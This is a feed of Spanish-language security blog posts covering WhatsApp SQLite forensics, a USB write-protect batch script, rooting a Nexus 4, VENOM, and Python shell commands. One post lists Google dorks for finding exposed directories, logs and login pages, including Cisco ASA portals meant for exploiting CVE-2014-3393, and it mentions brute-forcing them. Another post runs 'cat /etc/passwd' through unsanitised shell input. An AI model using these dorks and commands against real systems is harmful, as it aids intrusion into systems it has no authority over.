Analizando la información de la imagen 10, se puede observar que se tiene el Key_remote_jid | key_from_me | key_id | status | data | timestamp. Se ha escogido un registro "no borrado" de la base de datos para analizar, de forma que se pueda contrastar la información resultante.

Con ayuda de DFSLite, se puede extraer la información para el registro 11358 de la página 3, donde se resumen de la forma siguiente:

** Page 3 - Cell Data 1/4 Offset 11358

- RowID: 8

- Size: 101

- Header: 32

- Data:

20004108270808290500000f0800000008080808000d0501010100000008

0000333436373432353639313540732e77686174736170702e6e65745557

6870734b34507765664330546f646f20656e206f7264656e210151245e46a

8300151245cfd47ffffff

Cada uno de los campos de la base de datos se codifica según lo que en SQLite se conoce como "Serial Type Codes Of The Record Format", como ya podéis imaginar con DFSLite he decodificado la información del PAYLOAD HEADER y se obtiene el tipo de cada uno de los campos de la base de datos y el tamaño, para el caso aquí se analiza, el timestamp es tipo Integer (48bits) ~ 6 bytes.

ST2Labs 12 - DFSLite Decode Cell SQLite Data

Analizando la información con ayuda de un editor hexadecimal:

ST2Labs 13 - Cell Data to Offset 11358

Ya tenemos el timestamp del mensaje de WhatsApp, solo hace falta decodificar el valor hexadecimal convertido a decimal para obtener un valor Fecha y Hora.

Pero esto lo haremos en la ultima parte de mi artículo donde publicaré el código de DFTime que convierte el timestamp de 6 bytes, y comentaré como recuperar mensjes "eliminados" de la base de datos.

#ST2Labs

#GEOSystemSoftware

www.st2labs.com | www.seguridadparatodos.es

Digital Forensics of Android WhatsApp SQLite Database (Part I)

noreply@blogger.com (Julian J. Gonzalez) — Thu, 26 Nov 2015 17:00:00 +0000

Hace poco me he tenido que enfrentar al análisis forense de la aplicación Whatsapp en Android, y la sorpresa es la limitada información que existe al respecto. Whatsapp no tiene una API pública, y no sólo eso, sino que persigue claramente a quién tras aplicar ingeniería inversa publica información al respecto, me estoy refiriendo sobretodo a la información del protocolo interno de la aplicación.

Antecedentes

Independientemente de la información existente, mi reto no era descifrar la base de datos y recuperar los mensajes (sobre esto si se encuentra disponible un amplio abanico de artículos en Internet), sino recuperar mensajes eliminados de la base de datos, tanto si la aplicación ha sido eliminada (desinstalada) como si simplemente se ha eliminado el historial de chat desde el interfaz de la aplicación.

Por tanto, el trabajo es analizar la estructura interna de una base de datos SQLite, con el objetivo de recuperar la información que ha sido eliminada y que una sentencia SQL no es capaz de mostrar.

En este punto es donde empieza mi artículo, analizar el formato de SQLite para recuperar información eliminada.

Estructura de SQLite

Lo principal para analizar una base de datos SQLite internamente es conocer su formato interno, para ello lo mejor es consultar la documentación oficial (SQLite Database File Format) donde se explica como se organiza la información dentro del fichero con extensión .db (SQLite).

Una base de datos SQLite se organiza internamente en páginas, y dentro de cada página se almacenan los registros (filas), que se llaman celdas, correspondientes a la información de las tablas de la base de datos. Cada página tiene asignada una función dentro de la estructura del esquema de la base de datos (sql_master), es decir, una tabla de la base de datos almacena información en las celdas de una página.

De forma resumida, se puede representar el funcionamiento interno de una base de datos SQLite tal y como se puede ver en la siguiente imagen:

ST2Labs 1 - SQLite Format Brief

Para conocer el esquema de la base de datos, se puede ejecutar una sentencia SQL tal que así:

SELECT * FROM sqlite_master;

o bien, he creado mi propia herramienta que facilita la consulta de información de una base de datos SQLite, tal que así:

python sqlite_ex.py msgstore.db

ST2Labs 2 - WhatsApp sql_master (db_schema)

Además la herramienta permite hacer un "dump" de la base de datos, guardar en un archivo el esquema de la base de datos al completo, o mostrar la información de una tabla en particular, por ejemplo, y siguiendo con el hilo del articulo, vamos a consultar la información sobre la tabla "message" que es donde Whatsapp almacena la información de los mensajes que se intercambian.

python sqlite_ex.py -i messages msgstore.db

ST2Labs 3 - WhatsApp Messages Table Info

Volviendo a la imagen 2, se observa que la tabla "messages" de WhatsApp se encuentra almacenada en la página 3 de la base de datos SQLite (msgstore.db) y la imagen 3 nos muestra el "contenido" como será organizado en la celda que se generan dentro de la base de datos en la página 3.

Volveremos más tarde a esta información, que nos resultará útil más adelante cuando empiece a analizar la estructura interna del fichero msgstore.db para recuperar la información eliminada.

Pero esto lo dejo para mi siguiente artículo.

La herramienta que he utilizado en éste artículo la podéis encontrar en mi repositorio oficial (https://github.com/ST2Labs/DFIR) o descargar la versión para windows directamente a continuación:

sqlite_ex.exe

sha1:
7IR6FALIEDG6EPAIE6LVMTZY2UFQVEOO (sha1 base 32)

sha-256:
6FE6BB8DB06D1A8E17ACD8B79A372821B23260468A92B54EAE229906D32FFACF

sha-512:
9D8A9AC6037F5F75367F31E2516D98613E8633C79536B99A76ACAD56865250A7845C8A411F1AB8213353DE7EB67AE3E429AAE063049E9A44B4E5E95444C3500C

Referencias:
[1] SQLlite File Format

#ST2Labs #GEOSystemSoftware
#DFIR
#Forensics

Windows Forensics Tips - USB Write Protected

noreply@blogger.com (Julian J. Gonzalez) — Mon, 19 Oct 2015 08:34:00 +0000

Hi every one!

This post I have decided write in english why? Answer is why not? In Digital Forensics it's so important to mantain integrity of evidence, is for this reason what you need read data without any modification. Sometime you get the "evidence" and write into a USB stick, then if you have to read data into windows device, you must enable write protetection for USB device to avoid any modification of them.

This is the target of this "post", I've wrote a simple batch script to "enable" and "disable" the USB write protection it as soon as you need. By default windows always allow write into USB device.

The usage is so easy, is like "stop / start", before you plug the USB device you must used the script, so on all USB is write protected. And if you used script again, you disable it, so on the next USB device is not write protected.

Here the script:

@ECHO OFF &SETLOCAL
:: ****************
::
:: getUSBProtect v.01
::
:: @Fecha: 16/09/2015
:: @Version: 0.1
:: @Autor: Julian J. Gonzalez
:: @Dept: ST2Labs - www.seguridadparatodos.es
::
:: ****************

SET key="HKLM\System\CurrentControlSet\Control\StorageDevicePolicies"
SET value=WriteProtect

:: BatchGotAdmin
:-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"

"%temp%\getadmin.vbs"
exit /B

:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------

:: Check if Key exist
reg query %key% >nul 2>&1
IF ERRORLEVEL 1 (
GOTO writeup
)

:: Key exist and now we can verify Registry Value
FOR /F "tokens=2*" %%A IN ('reg query %key% /v %value%') DO SET _base=%%B

:: Verify is WriteProtect is Enable
if %_base%==0x1 (
GOTO writeoff
) else ( GOTO writeup )

:writeup
reg add %key% /v %value% /t REG_DWORD /d 0x1 /f
mshta "about:<script>alert('USB Write Protect is Enable !!!');close()</script>"
GOTO:EOF

:writeoff
reg add %key% /v %value% /t REG_DWORD /d 0x0 /f
mshta "about:<script>alert('USB Write Protect is Disable !!!');close()</script>"
GOTO:EOF

Get the Script // Check my GitHub:
https://github.com/ST2Labs/DFIR

How works

Windows control write protection on USB device through windows registry key:

SET key="HKLM\System\CurrentControlSet\Control\StorageDevicePolicies"
SET value=WriteProtect

Value 0 - Write Protection is disable
Value 1 - Write Protection is enable.

Remember, USB Device must be unplugged to make effect.

#Windows #Forensics #DFIR #ST2Labs
@seguridadxato2
@st2labs
@rhodius

3Ed - Máster Seguridad TIC 15/16 - Abierto Plazo de Matriculación

noreply@blogger.com (Julian J. Gonzalez) — Fri, 03 Jul 2015 18:25:00 +0000

! Cómo pasa el tiempo ¡ Ya ésta aquí la tercera edición del Máster Seguridad de la Comunicaciones y la Información (#MSTIC16) donde impartiré la clase práctica de Técnicas de Hacking y Pentesting, cómo novedad este año las 5 clases que impartiré serán totalmente en el laboratorio, con ejemplo y casos prácticos donde los alumnos se enfrentaran a casos reales, aprenderán a manejar las herramientas, interpretar los resultados y resolver problemas en entorno reales.

No perdáis la oportunidad para completar vuestra formación con un Máster muy completo, con un fuerte carácter practico y orientación profesional.

Además solo hay 20 plazas, a un precio muy competitivo con posibilidad de pago aplazado !!! Todavía estas ahí ??? Matricúlate ya, y no pierdas más tiempo.!!!

Si todavía necesitas más información, sigue leyendo.

[ Información General ]

El próximo curso académico la E.T.S. de Ingeniería de la Universidad de Sevilla lanzará la 3ª edición del Máster en Seguridad en las Tecnologías de la Información y las Comunicaciones.

Este título de postgrado de 66 ECTS tiene un enfoque profesional, con clases semipresenciales donde más del 50% son prácticas, y 2/3 del temario es impartido por los mejores especialistas de las empresas del sector.

En la próxima edición tan sólo se ofertarán 20 plazas, por lo que te animamos a que no dejes pasar esta oportunidad.

Si todavía no estas plenamente convencido, podrás obtener toda la información necesaria en :

- http://trajano.us.es/seguridadtic
- http://www.cfp.us.es/cursos/mu/seguridad-en-la-informacion-y-las-comunicaciones/4594/

www.st2labs.com Empresa Colaboradora del Máster. @rhodius imparte con clases presenciales las técnicas de Hacking y Pentesting.

Google Hacking Parte II

noreply@blogger.com (Unknown) — Sat, 20 Jun 2015 17:13:00 +0000

GOOGLE HACKING: PARTE II

Venimos de Google Hacking I, donde habíamos introducido los operadores que nos permiten exprimir al máximo este famoso buscador. Hoy veremos ejemplos sencillos de como podemos utilizar estos operadores.

Listado de directorios

Una de las acciones habituales a la hora de mejorar la seguridad de un sitio web, es desactivar el listado de directorios, es decir, evitar que el servidor muestre la lista de contenidos de los directorios públicos. Aunque es habitual que esta opción este deshabilitada, existen muchos servidores que la traen activa por defecto, por lo que si no es desactivada nos ofrecería una oportunidad única para recopilar información de valor.

Localizar listados de directorios mediante búsquedas de Google es sencillo. Aprovecharemos la circunstancia de que la gran mayoría de listados de directorios comienzan con la frase “Index of”, frase que también se mostrará en el titulo de la pagina. Una forma rápida para encontrar este tipo de paginas vendrá dada por la búsqueda; intitle:index.of, que buscara aquella paginas cuyo titulo sea “Index of”. Desafortunadamente, esta búsqueda devolverá multitud de falsos positivos, por lo que necesitaremos afinar un poco mas la búsqueda. Existen varias palabras claves que a menudo podemos encontrar en los listados de directorios, como son “parent directory”, “name” y “size”. Combinando estas palabras claves con la búsqueda anterior reduciremos drásticamente el numero de falsos positivos.

[ intitle:index.of “parent directory” ]

[ intitle:index.of name size ]

Buscando directorios y archivos

Ya hemos visto como localizar un listado de directorios, pero aun podemos afinar mas la búsqueda. Una opción interesante seria buscar un directorio donde pudiéramos encontrar información útil. Por ejemplo, para localizar un directorio de nombre “admin” sin tener que navegar por el listado, añadiríamos a la búsqueda el nombre del directorio de la siguiente forma:

[ intitle:index.of.admin ]

[ intitle:index.of inurl:admin ]

Pero el listado de directorios ademas de listar el nombre de los directorios, como su propio nombre indicia, también lista ficheros. Por tanto, es posible buscar mediante Google ficheros específicos sin necesidad de navegar por cada uno de los directorios. Por ejemplo, si pretendemos buscar ficheros de registro usaríamos la búsqueda:

[ intitle:index.of acces.log ]

Versión del servidor

Una pieza de información valiosa que nos ofrecen algunos listados de directorios es el nombre y numero de la versión software del servidor. Suele aparecer en la parte baja del listado del directorio, tal como se muestra en la siguiente imagen.

Para localizar este tipo de información usaremos la palabra clave “server at”, que aparece junto a la versión y nombre del software del servidor web. Podremos también, buscar un tipo de servidor en concreto, como por ejemplo Apache o IIS, e incluso una versión determinada, para lo que cambiaríamos el asterisco por la versión concreta.

[ intitle:index.of “server at” ]

[ intitle:index.of “Apache/* server at” ]

[ intitle:index.of “Microsoft-IIS/* server at” ]

Páginas de acceso

Cuando hablamos de páginas de acceso, hacemos referencia a aquellas paginas web que permiten el acceso a una zona restringida mediante unos determinados credenciales (habitualmente usuario y contraseña). Encontrar este tipo de página puede sernos útil, ya que podremos obtener información del software instalado, información que podremos usar posteriormente para buscar vulnerabilidades y exploits. Así mismo, podremos realizar el proceso inverso, es decir, a partir de un exploit, usar el buscador de Google para obtener posibles objetivos. Una ultima opción, seria realizar ataques de diccionario o fuerza bruta para intentar obtener acceso al área restringida.

Existen varias búsquedas que nos permiten encontrar paginas de acceso de forma general, es decir, buscaremos paginas de acceso sin tener en cuenta al servicio que podamos acceder si finalmente comprometemos el sistema. Por ejemplo, podemos buscar, mediante la URL, formularios web basados en ASP.NET que nos permitirán acceder a un área restringida (login.aspx) o formularios :

[ inurl:”/secure/login.aspx” ]

Otra opción, es buscar texto en la web que anuncie que nos encontramos ante un portal de acceso, por ejemplo, texto que nos pida que introduzcamos los credenciales necesarios:

[ intitle:Please Login "You have requested access” ]

Hemos visto como buscar páginas de acceso de forma general, pero podemos centrarnos en páginas de un software o hardware en concreto. Por ejemplo, seria interesante encontrar una pagina de acceso a una VPN SSL Clientless de Cisco ASA, software al que le fue descubierta una vulnerabilidad y que podríamos intentar explotar(CVE-2014-3393):

[ inurl:logon.html "CSCOE" ]

Tan solo tendríamos que encontrar una característica diferenciadora en alguno de los elementos (titulo, URL, texto...) para buscar un página de acceso de un software en concreto en el que tengamos interés. Otros ejemplos podrían ser, la búsqueda de paginas de acceso del gestor de aplicaciones virtuales de Citrix XenAppo a la plataforma anti-DDoS Peakflow SP de Arbor Networks:

[ inurl:"Citrix/XenApp/auth/login.aspx" -Xmarks ]

[ intext:"Please Authenticate" intitle:Peakflow]

robots.txt

Otra cosa interesante con la que podemos trastear” es con el fichero robots.txt. Este fichero de texto dicta unas “recomendaciones” para los crawlers de buscadores como Google o Bing sobre las páginas que no deben indexar.

Lo curioso e increíble es que estos buscadores suelen indexar este fichero, por lo que podemos obtener aquella información que los administradores quieren mantener oculta...¿muy lógico no?.

Haciendo búsquedas simples, podremos identificar instalaciones de phpMyAdmin, Wordpress, Drupal, Joomla...

[ inurl:.com/robots.txt- + "Disallow: /phpmyadmin/" ]

[ inurl:".com/robots.txt" + "Disallow: /wp-admin/ ]

[ inurl:".com/robots.txt" + "Disallow: ?q=admin" ]

[ inurl:"/robots.txt" + "Disallow: joomla" ]

E incluso ir mas allá y buscar determinados directorios o ficheros, que pretendan ser ocultados. Cuestión de imaginación.

En esta segunda parte hemos ejemplificado de forma eficaz como podemos hacer uso de los operadores de Google para buscar información útil de forma rápida y sencilla. Pero existen muchas mas posibilidades, como búsqueda de vulnerabilidades especificas, RFI, XSS, SQLi... Pero eso lo veremos en la tercera parte :)

#ST2Labs
@seguridadxato2
@jm_aparicio

II Jornada de Seguridad en las Comunicaciones y la Información

noreply@blogger.com (Julian J. Gonzalez) — Sat, 23 May 2015 16:45:00 +0000

El próximo 9/Junio estaré impartiendo un Taller práctico sobre Metasploit en la Escuela Técnica Superior de Ingeniera de Sevilla, !! sólo 100 plazas ¡¡¡ A continuación toda la información que necesitas saber, daros prisa, además tendréis un diploma de asistencia.

Objetivo

Jornada especialmente dirigido a Ingeniería de Telecomunicaciones e Ingeniería Informática, esta jornada pretende dar a conocer a los alumnos de últimos cursos el modelo de negocio de la seguridad en las comunicaciones y la información, proporcionando dos casos prácticos de hacking, creación de malware con Metasploit y técnicas de bastionado a uno de los CMS más difundidos y utilizados: Drupal.

Agenda

17:30 Bienvenida y presentación

17:30 - 1 Ponencia: La Seguridad Informática: Modelo de Negocio - Godofredo Fernández - Telefónica

18:30 - 2 Ponencia: Hacking Ético: Taller de Metasploit - Julian J González - ST2Labs

19:30 - 3 Ponencia: Seguridad Drupal - Ezequiel Vázquez - Institute for Integrative Nutrition

20:30 - Ronda Preguntas y clausura de la Jornada.

Lugar

Tendrá lugar el 9 de Junio 2015 a la 17:30 en el Salón de Grados de la E.T.S Ingenieros de la Universidad de Sevilla.

Mi charla será un Taller práctico sobre la herramienta Metasploit, con un ejemplo práctico sobre un escenario real.

Inscripciones y Diplomas

Abierto plazo de inscripción del 22 de Mayo 2015 al 08-Junio-2015 mediante el envío de un email a secreait@trajano.us.es con el Asunto: Jornada de Seguridad, en el cuerpo del correo indicar:

Nombre y apellidos de asistente.
Titulación y curso en que está matriculado.

Admisión de solicitudes será por riguroso orden de llegada, se informará al interesado por email.

Se entregará diploma de asistencia a la jornada para inclusión en el cirriculum vitae personal.

Referencia:
http://nerva.us.es/seguridad-9j.pdf

#ST2Labs
@seguridadxato2

VENOM Vulnerability - All VM are in Risk? (CVE-2015-3456)

noreply@blogger.com (Julian J. Gonzalez) — Thu, 14 May 2015 16:30:00 +0000

VENOM (CVE-2015-3456) is (Virtualized Eniroment Negleted Operations Manipulation), lo que viene a decir, que se ha descubierto una vulnerabilidad que permite acceder por completo al entorno de ejecución del hipervisor desde una máquina virtual cualquiera, lo que significa acceder por completo al entorno de ejecución del resto de máquina virtuales que tiene el Host en ejecución.


 Xen Security Advisory CVE-2015-3456 / XSA-133


version 2


Privilege escalation via emulated floppy disk drive

A continuación un ejemplo gráfico que ilustrará en que consiste la vulnerabilidad, y ayudará para evaluar el nivel de riesgo que tiene tu organización, si estas afectado por VENOM:

Crowdstrike - VENOM vulnerability

This vulnerability may allow an attacker to escape from the confines of an affected virtual machine (VM) guest and potentially obtain code-execution access to the host.

Pero ¿Qué sistema de virtualización se encuentra afectado por dicha vulnerabilidad?

The bug is in QEMU’s virtual Floppy Disk Controller (FDC). This vulnerable FDC code is used in numerous virtualization platforms and appliances, notably Xen, KVM, and the native QEMU client.

Sabemos por tanto que no todas VM se encuentran en riesgo, sino aquellas que están "running" en sistema virtuales basado en XEN, KVM y QEMU.

Las máquinas virtuales sobre VMware, Microsoft Hyper-V y Bochs no se encuentran afectadas por esta vulnerabilidad.

UPDATE: Si trabajas con KVM, QEMU y XEN Hypervisor, consulta las novedades en parches y actualizaciones de seguridad, aquí os dejo una muestra:

CrowdStrike is aware of the following vendor patches, advisories, and notifications.

We recommend you reach out to your vendors directly to get the latest security updates.

¿Qué pasa con QubesOS?

Hasta que no salga la versión 3.0 ésta se encuentra desarrollada sobre un hypervisor XEN, por lo que consulta la página oficial para conocer si esta disponible el parche.

Referencia: http://venom.crowdstrike.com/ | http://xenbits.xen.org/xsa/advisory-133.html

#ST2Labs - www.st2labs.com

Curso: SSN-ST2-01 - Security System and Network

noreply@blogger.com (Julian J. Gonzalez) — Wed, 13 May 2015 15:37:00 +0000

ACTUALIZACIÓN (26/06/2015): El curso ha sido cancelado por "agotamiento" de convocatoria. Hasta nuevo aviso, no habrá más cursos en colaboración ST2Labs y Canal Seguro. Aviso: no soy tutor de ningún otro curso en Canal Seguro, a menos que yo mismo lo anuncie de forma oficial a través de mis cuentas de redes sociales y este Blog_.

>>> /*

[..] lanza el curso de "Security Systems and Networks” con el firme objetivo de proporcionar al alumno las herramientas y conocimientos necesarios para realizar un análisis básico de seguridad de sistemas y redes, desde un perfil ético para poder detectar las vulnerabilidad y proponer contramedidas para reducir el nivel del riesgo. [...] */

Password Alert: Plugin para Google Chrome - Protege tus cuentas de Google

noreply@blogger.com (Julian J. Gonzalez) — Fri, 01 May 2015 11:06:00 +0000

Si eres de los que utiliza Google Chrome como navegador por defecto a diario en casa y el trabajo, te recomiendo que sigas leyendo.

-- Google Chrome Plugins - Password Alert

Google presenta una extensión para Google Chrome que te ayudará a protegerte frente a ataques de phishing que intentan conseguir tu contraseña de acceso a las cuentas de Google.

Alerta de protección de contraseña te ayuda a protegerte contra ataques de phishing
by Google.

Alerta de protección de contraseña también intenta detectar páginas de inicio de sesión de Google falsas antes de que introduzcas tu contraseña. Para ello, Alerta de protección de contraseña comprueba el código HTML de cada página que visitas para verificar si se trata de una página de inicio de sesión de Google auténtica.

¿Qué protege?

Alerta de protección de contraseña no protege las ventanas de incógnito, las aplicaciones de Chrome ni las extensiones de Chrome. Tampoco protege contraseñas de servicios que no son de Google. Alerta de protección de contraseña solo funciona en el navegador Chrome si JavaScript está activado.

Protege las contraseñas de los servicios de Google frente a ataques que pretender robar y suplantar nuestra identidad digital.

Privacidad

¿Alerta de protección de contraseña guarda mi contraseña o mis pulsaciones de teclas?

No, Alerta de protección de contraseña no almacena ni tu contraseña ni tus pulsaciones de teclas. En su lugar, guarda una miniatura segura de tu contraseña y luego la compara con la miniatura de tus pulsaciones de teclas más recientes en Chrome.

¿Adónde envía datos Alerta de protección de contraseña?

Si usas Alerta de protección de contraseña en una cuenta de Gmail, no se enviará ningún dato de tu ordenador. Si un administrador de Google for Work elige implementar Alerta de protección de contraseña en tu dominio, el administrador recibirá alertas cuando se active Alerta de protección de contraseña

Download

Descarga e instala la Extensión para Google Chrome:

https://chrome.google.com/webstore/detail/password-alert/noondiphcddnnabmjcihcjfbhfklnnep

#ST2Labs
@rhodius | @seguridadparatodos | @st2labs

Rooting my Nexus 4 with Android 5.0.1

noreply@blogger.com (Julian J. Gonzalez) — Sun, 12 Apr 2015 09:13:00 +0000

Es inusual escribir en inglés, pero en esta ocasión he preferido hacerlo así para ampliar el público objetivo :

First of all, What do you need to start?

1 . Have USB Driver installed in your system [ I supposed you have Windows]

2 . Enable USB Debbugin Options ( press 7 times in build info into Settings Menu )

3 . Need have Bootloader unlocked, if you don't, please check out this link.

Now you are ready to reborn your old Nexus Smartphone, get rooting o install custom recovery tool.

I would like to get rooting into my Nexus 4, because some security tool need have to access root to works well. And time ago I wrote this post about it "root or not?" (check out this link - in spanish only).

[ Get Root ]

Before start, is interesting what you make a backup to be protected if something go wrong!

1. Need have battery more than 70%
2. Download Wug’s Nexus Root Toolkit v2.0.5.

If you meet with requirements, you can start now:

Steps:

1. Restart your smartphone into Bootloader, you can do this keep hold VOL Down + Power button during start the phone.

2. Run Nexus Root Toolkit, select your model type (in my case Choose OCCAM-MAKO Android 5.0.1 - Build LRX22C)

3. Plug the usb of smartphone into your windows system

4. Press Root Button with Donwload custom loader and recovery.

5. Wait to software detect your device

If all goes well, Nexus Root Toolkit will do all for you, fisrt of all install a boot with root files, then restart your smartphone to insert a root file system and install a custom recovery too. All is automatic, when all finish you must have your phone rooted.

Now, I want to reborn my Nexus 4 and I have First of All WIPE all data and formating the smartphone, erase all data include operating system. Then smartphone can't start before I install a nwe operating system. !! Becareful if you formating all data even system ¡¡

[ Restore Nexus 4 ]

You can used Nexus Root Toolkit for restore you Nexus, you have to install a official Google ROM, the process is:

Steps to Restore phone:

1. Restart smartphone with Bootloader,
You must Press Hold VOL down + Power button to obtain access.

2. Run Nexus Root Toolkit,

Select Device: Choose OCCAM-MAKO Android 5.0.1 - Build LRX22C

3. Plug the USB of smartphone into the windows system

4. Press Restore/Upgrade/Downgrade button (next image)

Software donwload automatically from Internet ROM and install into you mobile, !! It's important choose correct device ¡¡¡ and this tool is only for Google Nexus 4 (Mako).

[ Custom ROM ]

Now that you have rooted your phone and custom recovery , these two requirements, you can install custom ROM.

Install new ROM it's easy, only you can save the custom file rom downloaded into internal smartphone storage and restart into recovery mode, then you have install "zip" and reboot when all it's end.

Example:

Direct Download: cm-11-20141115-SNAPSHOT-M12-mako.zip md5sum: 926e5115a2ec71fd3a01e1390686f5cd Short URL: http://get.cm/get/ldZ	224.75 MB

Note: You must enabled again "USB Debbuging options" once you had installed a new ROM, even if new ROM haven't root access, you must do the "root process" again.

I recommend install AFWall+ (Android Firewall based on IPtables) so you can control the network traffic flow in your device and help you to protect you against any authorized connection.

#ST2Labs
#Nexus4
#Android
#Security

GSMmap & Snoopsnitch: Android App to Mobile Self-Defense

noreply@blogger.com (Julian J. Gonzalez) — Fri, 10 Apr 2015 13:10:00 +0000

Hace ya un tiempo que os hable en mi charla sobre [In]Seguridad en Redes Móviles, en dicha charla os comentaba las debilidades / vulnerabilidades que existen en las redes móviles GSM/3G.

El año pasado en diciembre de 2014, durante el congreso del Chaos Computer Club, los investigadores de Security ReseachLabs han publicado una vez más las debilidades existentes en las redes móviles actuales, y además, han creado un par de proyectos software libre, el primero para alertar y mostrar la inseguridad / vulnerabilidades de las redes móviles en los operadores actuales, y el segundo, una herramienta orientada a la protección , donde se monitoriza la red móvil para alertar y advertir de ataques en la red de tu operador.

[ Mobile Self-Defense / SnoopsNitch ]

Srlabs ha creado y puesto a disposición de todo el mundo (proyecto OpenSource) una aplicación para móviles Android, llamada snoopsnitch, que permite analizar la seguridad de la red móvil de tu operador de telefonía, y detectar algunos de las amenazas existentes, como estaciones base (BTS) falsa que capturan el IMSI, seguimiento de usuarios (Tracking) y actualizaciones silenciosas, etc.

Además, se puede utilizar la aplicación SnoopSnitch para colaborar en el proyecto open source que muestra y compara la seguridad que existe entre las redes móviles de los operadores de telefonía móvil, este proyecto es http://gsmmap.org/.

Requisitos

Para poder ejecutar y que funcione la aplicación en el móvil se deben de cumplir los siguientes requisitos:

Qualcomm-based Android phone (see device list)
Stock Android ROM, version 4.1 or later
Note: Custom Android ROMs like CyanogenMod may or may not work, depending on the availability of a Qualcomm DIAG kernel driver (DIAG_CHAR).
Root privileges on phone

Lista completa de compatibilidad de dispositivos: https://opensource.srlabs.de/projects/snoopsnitch/wiki/DeviceList

Nexus 4 / Mako

LG-E960

CyanogenMod 11-20141115-SNAPSHOT-M12-mako or special kernel

Para los poseedores de un Nexus 4 se necesita una ROM Cynogen con un Kernel modificado. Esto entra en mi lista de TO-DO!

Incompatible Devices:

The following devices have been found to be incompatible and can not be used with SnoopSnitch:

Unsupported. Devices with custom ROM such as CyanogenMod which lacks the Qualcomm DIAG kernel driver (DIAG_CHAR)
Unsupported. Every device without Qualcomm chipset
Unsupported. Samsung Galaxy S2 & S3
Unsupported. Nexus 5 with stock Android
Unsupported. Huawei Ascend Y300

Download:

Pre-compiled .apk (SHA1: 58a4083ed6d50cf2a3de833233b42a0df6dc19e9)
Pre-compiled .apk from Google Play Store
Pre-compiled .apk from F-Droid

Source Code:

git clone --recursive https://opensource.srlabs.de/git/snoopsnitch.git

SnoopSnitch is released under the GPL v3 license (cf. source:COPYING). The app is known to built under Linux and OS X, see source:README for build instructions.

[ GSMmap]

GSM Security Map compares the protection capabilities of mobile networks

Se observa que en España hay muy pocos usuarios contribuyendo a este proyecto, lo que implica escasos datos para el análisis, sin embargo, en Alemania, existen una gran cantidad de usuarios aportando datos al proyecto.

Con los datos aportados, se analizan y se generan datos sobre la seguridad de las redes de los operadores de telefonía móvil. A continuación una captura de pantalla que se puede consultar en www.gsmmap.org sobre España y Alemania, respecto a la protección que ofrecen las operadoras móviles a ataques de interceptación de la comunicación.

En el caso de España, Vodafone y Movistar son las que más protección en redes 3G ofrecen, para ataques de interceptación de la comunicación. Sin embargo, Orange no sale tan bien parada en el analisis comparativo. No obstante, se debe de analizar el resultado de forma cauta, al verificar que no existen suficientes datos, es decir, hay pocos usuarios contribuyendo a este proyecto en España.

Pero al menos, en mi opinión, es un dato muy interesante y una página WEB a tener en consideración si decides cambiar de operador móvil, un nuevo factor de decisión a incluir,y no solo valorar a la operadora por su tarifa / plan o velocidad de los datos.

Además, observar que solamente existen datos comparativos de redes GSM/3G, dado que el despliegue de la red 4G es muy joven, y dispone de mejores medidas de seguridad.

Aplicación en Android

https://play.google.com/store/apps/details?id=de.srlabs.gsmmap

[ Transparencias / Slides ]

Puedes consultar las transparencia de la presentación que ofreció Security ResearchLabs en el 31C Security Conference el pasado 30/12/2014.

Slides

[ Vídeo de la Presentación ]

En el pasado 31C Chaos Computer Club Conference Security Research Labs presento su herramienta SnoopSnitch para demostrar la inseguridad que existe en los protocolos de telefonía móvil. En su charla demuestran lo "barato" que resulta interceptar las comunicaciones GSM/3G utilizando la debilidad del protocolo de señalización SS7.

[ References ]

https://opensource.srlabs.de/projects/snoopsnitch

http://gsmmap.org/#!/about

https://play.google.com/store/apps/details?id=de.srlabs.snoopsnitch

https://play.google.com/store/apps/details?id=de.srlabs.gsmmap

Python para Hacking (I) - Run a secure Shell command

noreply@blogger.com (Julian J. Gonzalez) — Thu, 02 Apr 2015 11:36:00 +0000

Ahora que estoy de vacaciones (bendita semana santa) he sacado un hueco para terminar uno de los muchos artículos que tengo pensado escribir sobre el lenguaje de programación python, donde a pesar de ser yo un recién llegado al mundo python, ya me siento extremadamente cómodo programando en python, hasta tal punto que se ha convertido en mi lenguaje favorito.

En artículos anteriores os hable de como usar python como lenguaje de Hacking, al hilo de los mismos, os voy a introducir en algunos conceptos y/o comandos de python de utilidad en el área de la Seguridad Informática, como por ejemplo ejecutar comandos del sistema de forma segura (evitando inyección arbitraria de comandos) desde un programa escrito en python.

Introducción

Cuando aprendes a programar lo habitual es empezar con el lenguaje pseudo-código y C, en mi experiencia programando, de C pase a emsablador Morotorla 6880 y luego C++; en el momento que empiezas a utilizar la programación orientada a Objetos descubres los beneficios e inconvenientes de los cuales no os voy a hablar. Lo mejor de python es la flexibilidad, rapidez e ingente cantidad de recursos disponibles con los que contar.

Tras probar varios lenguajes de programación (con sus contras y sus pros) me quedo con python, siendo este el inicio de una serie de artículos o publicaciones, donde os mostrare algunos ejemplos prácticos de programación en python (orientados a hacking), como es el caso de éste artículo, donde vamos a ver como leer los puertos abiertos del sistema (listening port).

¿ Por donde empiezo ?

Existen al menos tres maneras distintas de ejecutar un comando del sistema desde un programa escrito en python, la primera es utilizando las librerías del sistema os, la segunda, utilizando la librería subprocess y la tercera, es utilizando la librería commands.

Vamos a ilustrar con algunos ejemplos prácticos la utilización de las diferentes librerías. Sin embargo, tanto como la librerías commands, como la librería os, ha sido sustituidas por subprocess, por lo que centraré los ejemplos en subprocess.

Nota: Los ejemplos estan preparados para funcionar solamente en sistemas UNIX,

No obstante, las librerías commands, y os, ha sido sustituidas por subprocess.

Ejemplo 1

Ejecutar cualquier comando del sistema a través de un programa escrito con python (run a system command through python script), en el ejemplo se ha utilizado "ls -lsa", para listar el contenido de un directorio.

CODE_

Example python code - e1-py

OUT_

Example 1: e1.py - Run system command from python

Nota:

Passing shell=True can be a security hazard if combined with untrusted input (read about)

Ejemplo 2

Ejecuta cualquier comando introducido por el usuario desde el teclado o STDIN !

Example python code - e2.py

Nota:

Passing shell=True can be a security hazard if combined with untrusted input

(read about)

OUT_

Running cat /etc/passwd

Example 2: run cat /etc/passwd command from python code

